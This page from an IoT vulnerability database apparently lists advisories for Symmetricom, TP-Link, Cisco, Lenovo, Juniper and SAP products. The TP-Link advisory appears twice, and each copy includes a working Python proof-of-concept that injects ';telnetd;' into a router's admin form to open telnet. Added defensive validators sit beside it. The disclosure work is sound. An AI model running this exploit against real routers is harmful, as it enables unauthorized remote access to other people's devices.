VARIoT IoT vulnerabilities database

VAR-201801-0077 | CVE-2014-5068 | Symmetricom s350i Path traversal vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Directory traversal vulnerability in the web application in Symmetricom s350i 2.70.15 allows remote attackers to read arbitrary files via a (1) ../ (dot dot slash) or (2) ..\ (dot dot backslash) before a file name. Symmetricom s350i contains a path traversal vulnerability; information may be obtained. Microsemi Symmetricom s350i is a clock server from the American company Microsemi, and its web application is one of the device's components. A directory traversal vulnerability exists in the web application of Microsemi Symmetricom s350i version 2.70.15.
VAR-201801-0079 | CVE-2014-5070 | Symmetricom s350i Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Symmetricom s350i 2.70.15 allows remote authenticated users to gain privileges via vectors related to pushing unauthenticated users to the login page. Symmetricom s350i contains vulnerabilities related to authorization, permissions, and access control; information may be obtained, information may be altered, and a denial of service (DoS) condition may be caused. Microsemi Symmetricom s350i is a clock server from the American company Microsemi. A security vulnerability exists in Microsemi Symmetricom s350i version 2.70.15; a remote attacker could exploit it to gain privileges.
VAR-201801-0395 | CVE-2017-15614 | Command injection vulnerability in multiple TP-Link devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-outif variable in the pptp_client.lua file. TP-Link WVR, WAR, and ER devices contain a command injection vulnerability; information may be obtained, information may be altered, and a denial of service (DoS) condition may be caused. TP-Link WVR, WAR and ER devices are different series of router products from the Chinese company TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
These vulnerabilities can be triggered from the LAN and from the WAN (if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We have tested these vulnerabilities on TL-WVR450L (the latest version is TL-WVR450L V1.0161125) and TL-WVR900G (TL-WVR900G V3.0_170306).
The following models are also affected, as confirmed by the vendor:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The details of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all affected products have been fixed.
Vulnerability detail:
================
These vulnerabilities share the same root cause, so CVE-2017-15616 is explained here as the representative case.
The other vulnerabilities can be reproduced from the variable and Lua file named in the descriptions above.
In the /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
    -- the POST body carries the form as a JSON string in the "data" field
    local form_data = json.decode(http_form.data)
    -- "new" is the rule submitted by the user; its fields, including
    -- "interface", are stored without any validation
    local jdata = form_data.params.new
    ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
    if not ret then
        return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
    end
    if not uci_r:commit(CONFIG_NAME) then
        return false, err.ERR_COM_UCI_COMMIT
    end
    -- add the ref of interface
    -- the unchecked "interface" value is used from here on; a shell
    -- metacharacter in it leads to command injection (CVE-2017-15616)
    ifs.update_if_reference(jdata.interface, 1)
    sys.fork_exec('/etc/init.d/phddns restart')
    userconfig.cfg_modify()
    return jdata
end
***********************************
This file processes a POST request from the web management panel to the URL "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The "interface" argument in the POST body can carry a malformed command payload, and the Lua file does not check the argument sufficiently.
The malformed value of the "interface" argument then causes the command injection vulnerability.
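A server-side check of the kind add_phddns lacks, added here as an example; it is not code from the advisory or from the TP-Link firmware. It parses the "data" field of the phddns form body (the JSON shape the PoC below sends), rejects any string field that carries shell metacharacters, and then holds the "interface" value to an identifier grammar and an allowlist. It generalizes beyond CVE-2017-15616 by checking every field of params.new, since the sibling CVEs differ only in which variable carries the payload. The function name, the allowlist contents and the sample bodies are constructed for this example.

```python
import json
import re

# Assumed allowlist of interface identifiers the DDNS client may bind to
# (constructed for this example; the firmware's real list is not on the page).
ALLOWED_INTERFACES = {"WAN1", "WAN2", "LAN"}
# Identifier grammar for the "interface" field: letters, digits, underscore.
IDENT_RE = re.compile(r"^[A-Za-z0-9_]{1,16}$")
# Characters a POSIX shell interprets; none belong in any field of this form.
SHELL_META = set(";|&$`\\\"'<>(){}\n\r\t")


def validate_add_request(raw_data):
    """Validate the 'data' POST field of the phddns add form.

    raw_data is the JSON string the panel submits. Returns (ok, reason):
    ok is True only when the request is well-formed and every user-supplied
    field is safe to store and hand to the service scripts.
    """
    try:
        req = json.loads(raw_data)
    except ValueError:
        return False, "malformed JSON"
    if not isinstance(req, dict) or req.get("method") != "add":
        return False, "unexpected method"
    params = req.get("params")
    new = params.get("new") if isinstance(params, dict) else None
    if not isinstance(new, dict):
        return False, "missing params.new"

    # Reject shell metacharacters in every string field, not just "interface":
    # the sibling CVEs differ only in which variable carries the payload.
    for key, value in new.items():
        if not isinstance(value, str):
            return False, "field %s must be a string" % key
        if any(c in SHELL_META for c in value):
            return False, "field %s contains shell metacharacters" % key

    iface = new.get("interface")
    if iface is None:
        return False, "missing interface"
    if not IDENT_RE.match(iface):
        return False, "interface is not a valid identifier"
    if iface not in ALLOWED_INTERFACES:
        return False, "interface not in allowlist"
    return True, "ok"


if __name__ == "__main__":
    # Constructed bodies: one benign, one shaped like the advisory's PoC body.
    benign = json.dumps({"method": "add", "params": {"index": 0, "old": "add", "key": "add",
                         "new": {"interface": "WAN1", "name": "test1",
                                 "passwd": "test", "enable": "on"}}})
    injected = benign.replace("WAN1", "WAN1;telnetd;")
    for body in (benign, injected):
        print(validate_add_request(body))
```

Run as a script it classifies the benign and the injected body; in a handler it would run before form:insert, returning the error to the client instead of storing the rule. The allowlist matters as much as the metacharacter filter: an identifier that is syntactically clean but unknown to the device should still be refused rather than passed to an init script.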
PoC file:
================
***********************************
import requests
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
# placeholder in VULURL that is replaced by the session token after login
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
    "Connection": "keep-alive",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Host": BASEURL[7:],
    "Origin": BASEURL,
    "Referer": "%s/webpages/login.html" % (BASEURL),
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
    "X-Requested-With": "XMLHttpRequest"
}
# the panel wraps every request as a JSON document in the "data" form field
login_data_value = {'method': 'login', 'params': {'password': PASSWORD, 'username': 'admin'}}
login_data = {'data': json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print(LOGINURL)
print(login_data)
res = s.post(LOGINURL, data=login_data)
# the login response is JSON; parse it rather than eval()-ing the body
stok = json.loads(res.text)['result']['stok']
print('[*] stok is %s' % (stok))
tmp_vul = VULURL.replace(MARK, stok)
print('[*] vul_url is %s ' % (tmp_vul))
# remove any existing phddns rule so that the "add" below succeeds
delete_data = {"method": "delete", "params": {"key": "key-0", "index": "0"}}
delete_data = {'data': json.dumps(delete_data)}
print('[+] delete existed rule')
res = s.post(tmp_vul, data=delete_data)
print('[*] response is: %s' % (res.text))
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
# the payload rides in the "interface" field of params.new, which add_phddns stores unchecked
vul_data = {"method": "add", "params": {"index": 0, "old": "add", "new": {"interface": "WAN1%s" % (payload), "name": "test1", "passwd": "test", "enable": "on"}, "key": "add"}}
vul_data = {'data': json.dumps(vul_data)}
print('[+] sending payload')
res = s.post(tmp_vul, data=vul_data)
print('[*] response is: %s' % (res.text))
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
VAR-201801-0396 | CVE-2017-15615 | Command injection vulnerability in multiple TP-Link devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the lcpechointerval variable in the pptp_client.lua file. TP-Link WVR, WAR, and ER devices contain a command injection vulnerability; information may be obtained, information may be altered, and a denial of service (DoS) condition may be caused. TP-Link WVR, WAR and ER devices are different series of router products from the Chinese company TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
VAR-201801-0397 | CVE-2017-15616 | Command injection vulnerability in multiple TP-Link devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the phddns.lua file. TP-Link WVR, WAR, and ER devices contain a command injection vulnerability; information may be obtained, information may be altered, and a denial of service (DoS) condition may be caused. TP-Link WVR, WAR and ER devices are different series of router products from the Chinese company TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
VAR-201801-0469 | CVE-2017-15617 | Command injection vulnerability in multiple TP-Link devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the iface variable in the interface_wan.lua file. TP-Link WVR, WAR, and ER devices contain a command injection vulnerability; information may be obtained, information may be altered, and a denial of service (DoS) condition may be caused. TP-Link WVR, WAR and ER devices are different series of router products from the Chinese company TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
VAR-201801-0470 | CVE-2017-15618 | Command injection vulnerability in multiple TP-Link devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-enable variable in the pptp_client.lua file. TP-Link WVR, WAR, and ER devices contain a command injection vulnerability; information may be obtained, information may be altered, and a denial of service (DoS) condition may be caused. TP-Link WVR, WAR and ER devices are different series of router products from the Chinese company TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We have tested these vulnerabilities on TL-WVR450L (the latest version is TL-WVR450L V1.0161125) and TL-WVR900G (TL-WVR900G V3.0_170306).
The vendor has confirmed that the following models are also affected:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The details of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all affected products have been fixed.
Vulnerability detail:
================
These vulnerabilities share the same root cause, so CVE-2017-15616 is explained here as the representative case.
The other vulnerabilities can be reproduced from the variable and Lua file named for each CVE in the CVE details above.
In the file /usr/lib/lua/luci/controller/admin/phddns.lua, line 113:
***********************************
function add_phddns(http_form)
    local form_data = json.decode(http_form.data)
    local jdata = form_data.params.new
    ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
    if not ret then
        return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
    end
    if not uci_r:commit(CONFIG_NAME) then
        return false, err.ERR_COM_UCI_COMMIT
    end
    -- add the ref of interface
    ifs.update_if_reference(jdata.interface, 1)
    sys.fork_exec('/etc/init.d/phddns restart')
    userconfig.cfg_modify()
    return jdata
end
***********************************
This file processes a POST request from the web management panel with the URL "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The "interface" argument of the POST request is read straight from the JSON body (form_data.params.new) and the Lua file does not validate it sufficiently.
A malformed value of the "interface" argument that carries shell metacharacters therefore reaches the command the controller runs, which is the command injection vulnerability.
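As an added, defender-side example (not code from the advisory or from the TP-Link firmware), the check that add_phddns should have applied to params.new before form:insert and fork_exec, written in Python 3 and run against the PoC's request body and a benign one. The interface allowlist (WAN1 to WAN4, LAN) and the per-field rules are assumptions, since the firmware's real interface names are not given on the page.

```python
import json
import re

# Allowlist of interface names the phddns form may reference.
# Assumption: the firmware's real interface names are not on the page; these are
# constructed placeholders in the same style as the "WAN1" value the PoC uses.
INTERFACE_RE = re.compile(r"^(WAN[1-4]|LAN)$")

# Metacharacters that let a value break out of a shell command line.
SHELL_META = frozenset(";|&`$(){}<>\n\r\\\"'")

# Per-field validators for the "new" object of the phddns form.
# Field names follow the PoC body; the rules themselves are this example's.
FIELD_RULES = {
    "interface": lambda v: INTERFACE_RE.match(v) is not None,
    "name": lambda v: re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", v) is not None,
    "passwd": lambda v: 1 <= len(v) <= 64 and not (set(v) & SHELL_META),
    "enable": lambda v: v in ("on", "off"),
}


def parse_form(data):
    """Mirror the Lua controller's json.decode(http_form.data).params.new,
    but reject anything that is not a JSON object of the expected shape."""
    try:
        form = json.loads(data)
    except ValueError as exc:
        raise ValueError("body is not valid JSON: %s" % exc)
    if not isinstance(form, dict):
        raise ValueError("body must be a JSON object")
    params = form.get("params")
    if not isinstance(params, dict) or not isinstance(params.get("new"), dict):
        raise ValueError("params.new missing or not an object")
    return params["new"]


def validate_phddns(new):
    """Return (ok, reason). ok is True only when every expected field is
    present, is a string, and passes its rule; unknown fields are rejected."""
    for field in FIELD_RULES:
        if field not in new:
            return False, "missing field %r" % field
    for field, value in new.items():
        rule = FIELD_RULES.get(field)
        if rule is None:
            return False, "unexpected field %r" % field
        if not isinstance(value, str):
            return False, "field %r is not a string" % field
        if not rule(value):
            return False, "field %r rejected: %r" % (field, value)
    return True, "ok"


def shell_meta_fields(new):
    """Detection helper: names of fields whose value carries shell
    metacharacters, independent of the allowlist. Usable over logged bodies."""
    return sorted(f for f, v in new.items()
                  if isinstance(v, str) and set(v) & SHELL_META)


def check_request_body(data):
    """What the controller should do before form:insert and fork_exec:
    parse, validate, and report which fields look like injection attempts."""
    try:
        new = parse_form(data)
    except ValueError as exc:
        return {"accepted": False, "reason": str(exc), "suspicious": []}
    ok, reason = validate_phddns(new)
    return {"accepted": ok, "reason": reason, "suspicious": shell_meta_fields(new)}


# Constructed sample bodies: the PoC's injected interface value beside a benign one.
POC_BODY = json.dumps({"method": "add", "params": {"index": 0, "old": "add",
    "new": {"interface": "WAN1;telnetd;", "name": "test1",
            "passwd": "test", "enable": "on"}, "key": "add"}})
BENIGN_BODY = json.dumps({"method": "add", "params": {"index": 0, "old": "add",
    "new": {"interface": "WAN1", "name": "test1",
            "passwd": "test", "enable": "on"}, "key": "add"}})

if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, check_request_body(body))
```

The allowlist rejects the PoC body on the interface field and the metacharacter scan names that field, while the benign body passes both checks.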
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
VAR-201801-0471 | CVE-2017-15619 | Command injection vulnerability in multiple TP-Link devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the pptphellointerval variable in the pptp_client.lua file. TP-Link WVR, WAR and ER devices contain a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). TP-Link WVR, WAR and ER devices are different series of router products from China's TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
VAR-201801-0556 | CVE-2017-15621 | Command injection vulnerability in multiple TP-Link devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the olmode variable in the interface_wan.lua file. TP-Link WVR, WAR and ER devices contain a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). TP-Link WVR, WAR and ER devices are different series of router products from China's TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
VAR-201801-0345 | CVE-2017-12308 | Cisco Small Business 300 Series and 500 In series managed switch software HTTP Response splitting vulnerability |
CVSS V2: 5.8 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web framework of Cisco Small Business Managed Switches software could allow an unauthenticated, remote attacker to conduct an HTTP response splitting attack against a user of the web interface of an affected system. The vulnerability is due to insufficient input validation of some parameters that are passed to the web server of the affected system. An attacker could exploit this vulnerability by convincing a user to follow a malicious link or by intercepting a user request and injecting malicious code into the request. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected web interface or allow the attacker to access sensitive browser-based information. This vulnerability affects the following Cisco Small Business 300 and 500 Series Managed Switches: Cisco 350 Series Managed Switches, Cisco 350X Series Stackable Managed Switches, Cisco 550X Series Stackable Managed Switches, Cisco ESW2 Series Advanced Switches, Cisco Small Business 300 Series Managed Switches, Cisco Small Business 500 Series Stackable Managed Switches. Cisco Bug IDs: CSCvg29980. The vendor has confirmed this vulnerability and published it as Bug ID CSCvg29980. Information may be obtained and information may be altered.
Attackers can leverage these issues to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into having a false sense of trust. The affected products are all switching devices of Cisco.
VAR-201801-0394 | CVE-2017-15613 | TP-Link WVR, WAR, and ER device arbitrary command execution vulnerability |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the cmxddns.lua file. TP-Link WVR, WAR and ER devices are different series of router products from China's TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
VAR-201801-0472 | CVE-2017-15620 | Command injection vulnerability in multiple TP-Link devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-zone variable in the ipmac_import.lua file. TP-Link WVR, WAR and ER devices contain a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). TP-Link WVR, WAR and ER devices are different series of router products from China's TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices.
VAR-201801-0503 | CVE-2017-3765 | Lenovo Enterprise Networking Operating System Authentication vulnerability |
CVSS V2: 6.2 CVSS V3: 7.0 Severity: HIGH |
In Enterprise Networking Operating System (ENOS) in Lenovo and IBM RackSwitch and BladeCenter products, an authentication bypass known as "HP Backdoor" was discovered during a Lenovo security audit in the serial console, Telnet, SSH, and Web interfaces. This bypass mechanism can be accessed when performing local authentication under specific circumstances. If exploited, admin-level access to the switch is granted. Lenovo Enterprise Networking Operating System (ENOS) contains an authentication vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Lenovo RackSwitch and BladeCenter are switch products of China's Lenovo. IBM RackSwitch and BladeCenter are IBM's switch products. An authentication bypass vulnerability exists in ENOS on Lenovo and IBM RackSwitch and BladeCenter switches. An attacker can use this vulnerability to gain access to the switch management interface and leak traffic through the switch, causing denial of service. Lenovo/IBM products are prone to a local authentication-bypass vulnerability. This may lead to further attacks.
VAR-201801-1065 | CVE-2018-0118 | Cisco Unified Communications Manager Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Unified Communications Manager could allow an unauthenticated, remote attacker to perform a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the web-based management interface to click a link that is designed to submit malicious input to the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information on the targeted device. Cisco Bug IDs: CSCvg51264. The vendor has confirmed this vulnerability and released it as Bug ID CSCvg51264. Information may be obtained and information may be altered. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution
VAR-201801-1084 | CVE-2018-0014 | Juniper Networks ScreenOS Information disclosure vulnerability in devices |
CVSS V2: 3.3 CVSS V3: 6.5 Severity: MEDIUM |
Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from previous packets. This issue is often detected as CVE-2003-0001. The issue affects all versions of Juniper Networks ScreenOS prior to 6.3.0r25. Juniper Networks ScreenOS devices contain an information disclosure vulnerability. This vulnerability is related to CVE-2003-0001. Information may be obtained. Juniper ScreenOS is an operating system of Juniper Networks that runs on NetScreen series firewalls. There is a security vulnerability in Juniper ScreenOS 6.3.0r25; the vulnerability is caused by the program not padding Ethernet packets with zeros
VAR-201801-1083 | CVE-2018-0013 | Juniper Networks Junos Space Network Management Platform Vulnerable to information disclosure |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A local file inclusion vulnerability in Juniper Networks Junos Space Network Management Platform may allow an authenticated user to retrieve files from the system. The platform enables automated configuration, monitoring and troubleshooting of devices and services throughout their lifecycle. An attacker could exploit this vulnerability to retrieve files from the system
VAR-201801-1082 | CVE-2018-0012 | Junos Space Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
Junos Space is affected by a privilege escalation vulnerability that may allow a local authenticated attacker to gain root privileges. Junos Space contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Juniper Junos Space is a set of network management solutions from Juniper Networks. The solution supports automated configuration, monitoring, and troubleshooting of devices and services throughout their lifecycle. An elevation of privilege vulnerability exists in Juniper Junos Space
VAR-201801-1264 | CVE-2018-2363 | SAP NetWeaver Code injection vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user's choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials. The vendor has confirmed this vulnerability and released it as SAP Security Note 2525392. Information may be obtained, information may be altered, and service operation may be disrupted (DoS).
